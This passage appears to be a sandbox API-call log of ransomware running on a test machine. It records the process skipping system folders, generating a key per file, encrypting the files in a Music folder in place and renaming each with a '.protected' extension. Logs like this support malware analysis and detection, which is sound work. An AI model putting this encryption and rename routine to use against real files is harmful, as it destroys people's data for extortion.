SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.249] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.249] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.249] CloseHandle (hObject=0xb4) returned 1 [0092.250] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3.protected") returned 59 [0092.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\bxlob.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\bxlob.mp3.protected")) returned 1 [0092.250] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.250] lstrcmpiW (lpString1="d80C27Uiwq uNp3.wav", lpString2="Windows") returned -1 [0092.250] lstrcmpiW (lpString1="d80C27Uiwq uNp3.wav", lpString2="Program Files") returned -1 [0092.250] lstrcmpiW (lpString1="d80C27Uiwq uNp3.wav", lpString2="Program Files (x86)") returned -1 [0092.250] lstrcmpiW (lpString1="d80C27Uiwq uNp3.wav", lpString2="$Recycle.bin") returned 1 [0092.250] lstrcmpiW (lpString1="d80C27Uiwq uNp3.wav", lpString2="System Volume Information") returned -1 [0092.250] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav") returned 59 [0092.250] StrStrIW (lpFirst="d80C27Uiwq uNp3.wav", lpSrch=".protected") returned 0x0 [0092.250] lstrcmpW (lpString1="d80C27Uiwq uNp3.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.250] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.250] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d80c27uiwq unp3.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav") returned 59 [0092.251] StrStrW (lpFirst="d80C27Uiwq uNp3.wav", lpSrch=".txt") returned 0x0 [0092.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav") returned 59 [0092.251] StrStrW (lpFirst="d80C27Uiwq uNp3.wav", lpSrch=".rar") returned 0x0 [0092.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav") returned 59 [0092.251] StrStrW (lpFirst="d80C27Uiwq uNp3.wav", lpSrch=".zip") returned 0x0 [0092.251] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.251] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.251] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.252] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.252] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.252] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.252] CloseHandle (hObject=0xb4) returned 1 [0092.252] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav.protected") returned 69 [0092.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d80c27uiwq unp3.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\d80C27Uiwq uNp3.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d80c27uiwq unp3.wav.protected")) returned 1 [0092.252] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.252] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0092.252] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0092.252] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0092.253] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0092.253] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0092.253] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 51 [0092.253] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0092.253] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0092.253] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.253] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.253] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 51 [0092.253] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0092.253] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 51 [0092.253] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0092.253] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 51 [0092.253] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0092.253] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0092.254] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.254] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0092.254] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.254] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.254] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.254] CloseHandle (hObject=0xb4) returned 1 [0092.254] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.protected") returned 61 [0092.254] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini.protected")) returned 1 [0092.255] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.255] lstrcmpiW (lpString1="F-YH3EDiaGExl01i0.mp3", lpString2="Windows") returned -1 [0092.255] lstrcmpiW (lpString1="F-YH3EDiaGExl01i0.mp3", lpString2="Program Files") returned -1 [0092.255] lstrcmpiW (lpString1="F-YH3EDiaGExl01i0.mp3", lpString2="Program Files (x86)") returned -1 [0092.255] lstrcmpiW (lpString1="F-YH3EDiaGExl01i0.mp3", lpString2="$Recycle.bin") returned 1 [0092.255] lstrcmpiW (lpString1="F-YH3EDiaGExl01i0.mp3", lpString2="System Volume Information") returned -1 [0092.255] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3") returned 61 [0092.255] StrStrIW (lpFirst="F-YH3EDiaGExl01i0.mp3", lpSrch=".protected") returned 0x0 [0092.255] lstrcmpW (lpString1="F-YH3EDiaGExl01i0.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.255] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.255] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f-yh3ediagexl01i0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3") returned 61 [0092.255] StrStrW (lpFirst="F-YH3EDiaGExl01i0.mp3", lpSrch=".txt") returned 0x0 [0092.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3") returned 61 [0092.255] StrStrW (lpFirst="F-YH3EDiaGExl01i0.mp3", lpSrch=".rar") returned 0x0 [0092.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3") returned 61 [0092.256] StrStrW (lpFirst="F-YH3EDiaGExl01i0.mp3", lpSrch=".zip") returned 0x0 [0092.256] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.256] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.256] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.256] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.256] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.256] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.256] CloseHandle (hObject=0xb4) returned 1 [0092.257] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3.protected") returned 71 [0092.257] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f-yh3ediagexl01i0.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F-YH3EDiaGExl01i0.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f-yh3ediagexl01i0.mp3.protected")) returned 1 [0092.257] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.257] lstrcmpiW (lpString1="GyaaV1K.m4a", lpString2="Windows") returned -1 [0092.257] lstrcmpiW (lpString1="GyaaV1K.m4a", lpString2="Program Files") returned -1 [0092.257] lstrcmpiW (lpString1="GyaaV1K.m4a", lpString2="Program Files (x86)") returned -1 [0092.257] lstrcmpiW (lpString1="GyaaV1K.m4a", lpString2="$Recycle.bin") returned 1 [0092.257] lstrcmpiW (lpString1="GyaaV1K.m4a", lpString2="System Volume Information") returned -1 [0092.257] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a") returned 51 [0092.257] StrStrIW (lpFirst="GyaaV1K.m4a", lpSrch=".protected") returned 0x0 [0092.257] lstrcmpW (lpString1="GyaaV1K.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0092.257] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.257] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gyaav1k.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a") returned 51 [0092.258] StrStrW (lpFirst="GyaaV1K.m4a", lpSrch=".txt") returned 0x0 [0092.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a") returned 51 [0092.258] StrStrW (lpFirst="GyaaV1K.m4a", lpSrch=".rar") returned 0x0 [0092.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a") returned 51 [0092.258] StrStrW (lpFirst="GyaaV1K.m4a", lpSrch=".zip") returned 0x0 [0092.258] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.259] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.259] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.259] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.259] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.259] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.259] CloseHandle (hObject=0xb4) returned 1 [0092.259] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a.protected") returned 61 [0092.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gyaav1k.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GyaaV1K.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gyaav1k.m4a.protected")) returned 1 [0092.260] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.260] lstrcmpiW (lpString1="kBpzP-b4RDX-RknRQ", lpString2="Windows") returned -1 [0092.260] lstrcmpiW (lpString1="kBpzP-b4RDX-RknRQ", lpString2="Program Files") returned -1 [0092.260] lstrcmpiW (lpString1="kBpzP-b4RDX-RknRQ", lpString2="Program Files (x86)") returned -1 [0092.260] lstrcmpiW (lpString1="kBpzP-b4RDX-RknRQ", lpString2="$Recycle.bin") returned 1 [0092.260] lstrcmpiW (lpString1="kBpzP-b4RDX-RknRQ", lpString2="System Volume Information") returned -1 [0092.260] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ") returned 57 [0092.260] lstrcmpW (lpString1="kBpzP-b4RDX-RknRQ", lpString2=".") returned 1 [0092.260] lstrcmpW (lpString1="kBpzP-b4RDX-RknRQ", lpString2="..") returned 1 [0092.260] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\*") returned 59 [0092.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.260] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.260] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.260] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.260] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.260] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.260] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\.") returned 59 [0092.260] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.260] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.261] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.261] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.261] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.261] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.261] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.261] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\..") returned 60 [0092.261] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.261] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.261] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.261] lstrcmpiW (lpString1="3ib5L uWAaJ3_mKsP3PC.mp3", lpString2="Windows") returned -1 [0092.261] lstrcmpiW (lpString1="3ib5L uWAaJ3_mKsP3PC.mp3", lpString2="Program Files") returned -1 [0092.261] lstrcmpiW (lpString1="3ib5L uWAaJ3_mKsP3PC.mp3", lpString2="Program Files (x86)") returned -1 [0092.261] lstrcmpiW (lpString1="3ib5L uWAaJ3_mKsP3PC.mp3", lpString2="$Recycle.bin") returned 1 [0092.261] lstrcmpiW (lpString1="3ib5L uWAaJ3_mKsP3PC.mp3", lpString2="System Volume Information") returned -1 [0092.261] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3") returned 82 [0092.261] StrStrIW (lpFirst="3ib5L uWAaJ3_mKsP3PC.mp3", lpSrch=".protected") returned 0x0 [0092.261] lstrcmpW (lpString1="3ib5L uWAaJ3_mKsP3PC.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.261] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.261] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\3ib5l uwaaj3_mksp3pc.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.262] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3") returned 82 [0092.262] StrStrW (lpFirst="3ib5L uWAaJ3_mKsP3PC.mp3", lpSrch=".txt") returned 0x0 [0092.262] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3") returned 82 [0092.262] StrStrW (lpFirst="3ib5L uWAaJ3_mKsP3PC.mp3", lpSrch=".rar") returned 0x0 [0092.262] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3") returned 82 [0092.262] StrStrW (lpFirst="3ib5L uWAaJ3_mKsP3PC.mp3", lpSrch=".zip") returned 0x0 [0092.262] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.262] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.262] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.262] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.263] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.263] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.263] CloseHandle (hObject=0xd4) returned 1 [0092.263] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3.protected") returned 92 [0092.263] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L 